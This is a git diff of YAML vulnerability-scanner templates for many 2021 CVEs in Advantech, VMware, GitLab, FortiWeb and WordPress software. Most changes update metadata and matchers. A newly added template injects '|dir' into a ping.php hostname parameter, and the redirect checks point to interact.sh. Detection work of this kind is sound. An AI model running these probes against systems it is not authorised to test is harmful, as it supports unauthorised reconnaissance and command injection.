@@ -1,13 +1,13 @@
 id: CVE-2021-21801
 
 info:
-  name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS)
+  name: Advantech R-SeeNet - Cross-Site Scripting
   author: gy741
   severity: medium
-  description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
-    arbitrary JavaScript code execution.
+  description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21801
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml
index df8b1fca2a..e7747ced21 100644
--- a/cves/2021/CVE-2021-21802.yaml
+++ b/cves/2021/CVE-2021-21802.yaml
@@ -1,13 +1,13 @@
 id: CVE-2021-21802
 
 info:
-  name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS)
+  name: Advantech R-SeeNet - Cross-Site Scripting
   author: gy741
   severity: medium
-  description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
-    arbitrary JavaScript code execution.
+  description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21801
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml
index f754602e3e..9b4a033bb7 100644
--- a/cves/2021/CVE-2021-21803.yaml
+++ b/cves/2021/CVE-2021-21803.yaml
@@ -1,13 +1,13 @@
 id: CVE-2021-21803
 
 info:
-  name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS)
+  name: Advantech R-SeeNet - Cross-Site Scripting
   author: gy741
   severity: medium
-  description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
-    arbitrary JavaScript code execution.
+  description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21803
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21805.yaml b/cves/2021/CVE-2021-21805.yaml
new file mode 100644
index 0000000000..a8d834c84d
--- /dev/null
+++ b/cves/2021/CVE-2021-21805.yaml
@@ -0,0 +1,44 @@
+id: CVE-2021-21805
+
+info:
+  name: Advantech R-SeeNet v 2.4.12 - OS Command Injection
+  author: arafatansari
+  severity: critical
+  description: |
+    Advantech R-SeeNet v 2.4.12 is vulnerable to OS Command Injection in the ping.php script functionality.
+  reference:
+    - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21805
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-21805
+    cwe-id: CWE-78
+  metadata:
+    shodan-query: http.html:"R-SeeNet"
+    verified: "true"
+  tags: cve,cve2021,rce,r-seenet
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/php/ping.php?hostname=|dir"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Ping |dir</title>"
+          - "bottom.php"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2021/CVE-2021-21881.yaml b/cves/2021/CVE-2021-21881.yaml
index 4dc66dd082..1e36958c23 100644
--- a/cves/2021/CVE-2021-21881.yaml
+++ b/cves/2021/CVE-2021-21881.yaml
@@ -9,7 +9,7 @@ info:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21881
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 9.9
     cve-id: CVE-2021-21881
     cwe-id: CWE-78
diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml
index 729343b765..4d2aa8a5d3 100644
--- a/cves/2021/CVE-2021-21972.yaml
+++ b/cves/2021/CVE-2021-21972.yaml
@@ -4,16 +4,18 @@ info:
   name: VMware vSphere Client (HTML5) - Remote Code Execution
   author: dwisiswant0
   severity: critical
-  description: "VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2)."
+  description: VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
   reference:
     - https://swarm.ptsecurity.com/unauth-rce-vmware/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21972
+    - https://www.vmware.com/security/advisories/VMSA-2021-0002.html
+    - http://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-21972
     cwe-id: CWE-269
-  tags: cve,cve2021,vmware,rce,vcenter
+  tags: cve2021,vmware,rce,vcenter,kev,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-21973.yaml b/cves/2021/CVE-2021-21973.yaml
index dd4c62ba56..7c5330634b 100644
--- a/cves/2021/CVE-2021-21973.yaml
+++ b/cves/2021/CVE-2021-21973.yaml
@@ -4,19 +4,18 @@ info:
   name: VMware vCenter Unauthenticated SSRF
   author: pdteam
   severity: medium
-  description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port
-    443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n)
-    and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
+  description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21973
     - https://twitter.com/osama_hroot/status/1365586206982082560
     - https://twitter.com/bytehx343/status/1486582542807420928
+    - https://www.vmware.com/security/advisories/VMSA-2021-0002.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2021-21973
     cwe-id: CWE-918
-  tags: cve,cve2021,vmware,ssrf,vcenter,oast
+  tags: cve,cve2021,vmware,ssrf,vcenter,oast,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-21975.yaml b/cves/2021/CVE-2021-21975.yaml
index 8483f29da1..f6c9016b48 100644
--- a/cves/2021/CVE-2021-21975.yaml
+++ b/cves/2021/CVE-2021-21975.yaml
@@ -1,19 +1,20 @@
 id: CVE-2021-21975
 
 info:
-  name: vRealize Operations Manager API SSRF (VMWare Operations)
+  name: vRealize Operations Manager API - Server-Side Request Forgery
   author: luci
   severity: high
-  description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using
-    CVE-2021-21983.
+  description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.
   reference:
     - https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+    - http://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21975
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-21975
     cwe-id: CWE-918
-  tags: cve,cve2021,ssrf,vmware,vrealize
+  tags: kev,packetstorm,cve,cve2021,ssrf,vmware,vrealize
 
 requests:
   - raw:
@@ -26,13 +27,17 @@ requests:
 
     matchers-condition: and
     matchers:
+
       - type: word
+        part: body
         words:
           - 'vRealize Operations Manager'
           - 'thumbprint'
           - 'address'
         condition: and
-        part: body
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml
index 4f23f36fb6..bb2f27187e 100644
--- a/cves/2021/CVE-2021-21978.yaml
+++ b/cves/2021/CVE-2021-21978.yaml
@@ -11,12 +11,14 @@ info:
   reference:
     - https://twitter.com/osama_hroot/status/1367258907601698816
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21978
+    - https://www.vmware.com/security/advisories/VMSA-2021-0003.html
+    - http://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-21978
     cwe-id: CWE-434
-  tags: cve,cve2021,vmware,rce
+  tags: cve,cve2021,vmware,rce,packetstorm,fileupload,intrusive
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml
index 303389b8c8..692bb84f7e 100644
--- a/cves/2021/CVE-2021-21985.yaml
+++ b/cves/2021/CVE-2021-21985.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-21985
     cwe-id: CWE-20
-  tags: cve,cve2021,rce,vsphere,vmware
+  tags: cve,cve2021,rce,vsphere,vmware,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-22005.yaml b/cves/2021/CVE-2021-22005.yaml
index 12606d2108..37b24699b5 100644
--- a/cves/2021/CVE-2021-22005.yaml
+++ b/cves/2021/CVE-2021-22005.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-22005
     cwe-id: CWE-434
-  tags: cve,cve2021,vmware,vcenter,upload
+  tags: cve,cve2021,vmware,vcenter,fileupload,kev,intrusive
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-22053.yaml b/cves/2021/CVE-2021-22053.yaml
index 9ff82e8a66..d30f885398 100644
--- a/cves/2021/CVE-2021-22053.yaml
+++ b/cves/2021/CVE-2021-22053.yaml
@@ -1,17 +1,17 @@
 id: CVE-2021-22053
 
 info:
-  name: RCE through SpringEL expressions in Spring Cloud Netflix Hystrix Dashboard < 2.2.10.RELEASE
+  name: Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
   author: forgedhallpass
   severity: high
   description: |
-    Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates.
-    When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
+    Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates.  When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-22053
     - https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
     - https://tanzu.vmware.com/security/cve-2021-22053
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-22053
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2021-22053
     cwe-id: CWE-94
@@ -24,10 +24,14 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 500
+
       - type: word
         part: interactsh_protocol
         words:
           - "dns"
+
+      - type: status
+        status:
+          - 500
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-22054.yaml b/cves/2021/CVE-2021-22054.yaml
index 1128d4f736..4b06bbfe67 100644
--- a/cves/2021/CVE-2021-22054.yaml
+++ b/cves/2021/CVE-2021-22054.yaml
@@ -1,16 +1,17 @@
 id: CVE-2021-22054
 
 info:
-  name: VMWare Workspace One UEM SSRF
+  name: VMWare Workspace ONE UEM - Server-Side Request Forgery
   author: h1ei1
   severity: high
-  description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
+  description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
   reference:
     - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/
+    - https://www.vmware.com/security/advisories/VMSA-2021-0029.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22054
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.50
+    cvss-score: 7.5
     cve-id: CVE-2021-22054
     cwe-id: CWE-918
   metadata:
@@ -24,10 +25,13 @@ requests:
 
     matchers-condition: and
     matchers:
+
+      - type: word
+        words:
+          - "Interactsh Server"
+
       - type: status
         status:
           - 200
 
-      - type: word
-        words:
-          - "<title>Example Domain</title>"
+# Enhanced by mp on 2022/06/27
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml
index 6c55deb978..77cad3e29d 100644
--- a/cves/2021/CVE-2021-22122.yaml
+++ b/cves/2021/CVE-2021-22122.yaml
@@ -1,15 +1,16 @@
 id: CVE-2021-22122
 
 info:
-  name: FortiWeb v6.3.x-6.2.x Unauthenticated XSS
+  name: FortiWeb - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
   description: |
-    An improper neutralization of input during web page generation in FortiWeb GUI interface 6.3.0 through 6.3.7 and version before 6.2.4 may allow an unauthenticated,
-    remote attacker to perform a reflected cross site scripting attack (XSS) by injecting malicious payload in different vulnerable API end-points.
+    FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.
   reference:
     - https://www.fortiguard.com/psirt/FG-IR-20-122
     - https://twitter.com/ptswarm/status/1357316793753362433
+    - https://fortiguard.com/advisory/FG-IR-20-122
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-22122
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -30,3 +31,5 @@ requests:
           - "No policy has been chosen."
         condition: and
         part: body
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml
index 8971a38510..f569f928dc 100644
--- a/cves/2021/CVE-2021-22145.yaml
+++ b/cves/2021/CVE-2021-22145.yaml
@@ -4,18 +4,18 @@ info:
   name: ElasticSearch 7.13.3 - Memory disclosure
   author: dhiyaneshDk
   severity: medium
-  description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query
-    that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
+  description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
   reference:
     - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22145
     - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
+    - https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 6.5
     cve-id: CVE-2021-22145
     cwe-id: CWE-209
-  tags: cve,cve2021,elasticsearch
+  tags: cve,cve2021,elasticsearch,packetstorm
 
 requests:
   - method: POST
diff --git a/cves/2021/CVE-2021-22205.yaml b/cves/2021/CVE-2021-22205.yaml
index c21a8a975b..33786b4366 100644
--- a/cves/2021/CVE-2021-22205.yaml
+++ b/cves/2021/CVE-2021-22205.yaml
@@ -14,13 +14,13 @@ info:
     - https://hackerone.com/reports/1154542
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 9.9
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
     cve-id: CVE-2021-22205
     cwe-id: CWE-20
   metadata:
     shodan-query: http.title:"GitLab"
-  tags: cve,cve2021,gitlab,rce
+  tags: kev,hackerone,cve,cve2021,gitlab,rce
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml
index 72ec444e21..3692d196dd 100644
--- a/cves/2021/CVE-2021-22214.yaml
+++ b/cves/2021/CVE-2021-22214.yaml
@@ -1,16 +1,11 @@
 id: CVE-2021-22214
 
 info:
-  name: Unauthenticated Gitlab SSRF - CI Lint API
+  name: Gitlab CE/EE 10.5 - Server-Side Request Forgery
   author: Suman_Kar,GitLab Red Team
   severity: high
   description: |
-    When requests to the internal network for webhooks are enabled,
-    a server-side request forgery vulnerability in GitLab CE/EE affecting all
-    versions starting from 10.5 was possible to exploit for an unauthenticated
-    attacker even on a GitLab instance where registration is limited.
-    The same vulnerability actually spans multiple CVEs, due to similar reports
-    that were fixed across separate patches. These CVEs are:
+    GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:
     - CVE-2021-39935
     - CVE-2021-22214
     - CVE-2021-22175
@@ -47,3 +42,5 @@ requests:
         part: body
         words:
           - "does not have valid YAML syntax"
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml
index 1dbddff6e0..250303c802 100644
--- a/cves/2021/CVE-2021-22873.yaml
+++ b/cves/2021/CVE-2021-22873.yaml
@@ -7,32 +7,34 @@ info:
   description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22873
+    - https://hackerone.com/reports/1081406
+    - https://github.com/revive-adserver/revive-adserver/issues/1068
+    - http://seclists.org/fulldisclosure/2021/Jan/60
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-22873
     cwe-id: CWE-601
-  tags: cve,cve2021,redirect
+  metadata:
+    shodan-query: http.favicon.hash:106844876
+    verified: "true"
+  tags: cve2021,redirect,revive,hackerone,seclists,cve
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com"
-      - "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com"
-      - "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com"
-      - "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com"
-      - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
-      - "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
+      - "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh"
+      - "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh"
+      - "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh"
+      - "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh"
+      - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh"
+      - "{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"
 
     stop-at-first-match: true
     redirects: true
     max-redirects: 2
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        words:
-          - "<title>Example Domain</title>"
-        part: body
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml
index 08212fc078..714ad3c19a 100644
--- a/cves/2021/CVE-2021-22986.yaml
+++ b/cves/2021/CVE-2021-22986.yaml
@@ -13,7 +13,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-22986
-  tags: bigip,cve,cve2021,rce,mirai
+  tags: bigip,cve,cve2021,rce,mirai,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml
index 5dcb903be7..e5a8cb4784 100644
--- a/cves/2021/CVE-2021-23241.yaml
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -1,12 +1,14 @@
 id: CVE-2021-23241
 
 info:
-  name: Mercury Router Web Server Directory Traversal
+  name: MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion
   author: daffainfo
   severity: medium
-  description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
+  description: MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
   reference:
     - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
+    - https://www.mercusys.com/en/
+    - https://www.mercurycom.com.cn/product-521-1.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-23241
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
@@ -30,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2021/CVE-2021-24146.yaml b/cves/2021/CVE-2021-24146.yaml
index 2cd0de873a..806a8e57eb 100644
--- a/cves/2021/CVE-2021-24146.yaml
+++ b/cves/2021/CVE-2021-24146.yaml
@@ -1,19 +1,20 @@
 id: CVE-2021-24146
 
 info:
-  name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
+  name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure
   author: random_robbie
   severity: high
-  description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports
-    all events data in CSV or XML format for example.
+  description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format.
   reference:
     - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
+    - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24146
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-24146
     cwe-id: CWE-284
-  tags: wordpress,wp-plugin,cve,cve2021
+  tags: cve2021,wpscan,packetstorm,wordpress,wp-plugin,cve
 
 requests:
   - method: GET
@@ -32,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/22
diff --git a/vulnerabilities/wordpress/ninjaform-open-redirect.yaml b/cves/2021/CVE-2021-24165.yaml
similarity index 51%
rename from vulnerabilities/wordpress/ninjaform-open-redirect.yaml
rename to cves/2021/CVE-2021-24165.yaml
index 3431d9da92..ec65dbe367 100644
--- a/vulnerabilities/wordpress/ninjaform-open-redirect.yaml
+++ b/cves/2021/CVE-2021-24165.yaml
@@ -1,13 +1,21 @@
-id: ninjaform-open-redirect
+id: CVE-2021-24165
 
 info:
   name: Ninja Forms < 3.4.34 - Administrator Open Redirect
   author: dhiyaneshDk,daffainfo
-  severity: low
-  description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
+  severity: medium
+  description: |
+    The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
   reference:
     - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
-  tags: wordpress,redirect,wp-plugin,ninjaform,authenticated,wp
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24165
+    - https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-24165
+    cwe-id: CWE-601
+  tags: cve,cve2021,wordpress,redirect,wp-plugin,authenticated,wp,wpscan
 
 requests:
   - raw:
@@ -21,7 +29,7 @@ requests:
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
 
       - |
-        GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1
+        GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true
@@ -31,5 +39,5 @@ requests:
         dsl:
           - 'status_code_1 == 302'
           - 'status_code_2 == 302'
-          - "contains(all_headers_2, 'Location: https://example.com?client_id=1')"
+          - "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
         condition: and
diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml
index f2c2ef3ff5..c9dd9cfad4 100644
--- a/cves/2021/CVE-2021-24176.yaml
+++ b/cves/2021/CVE-2021-24176.yaml
@@ -1,19 +1,21 @@
 id: CVE-2021-24176
 
 info:
-  name: WordPress JH 404 Logger XSS
+  name: WordPress JH 404 Logger <=1.1 - Cross-Site Scripting
   author: Ganofins
   severity: medium
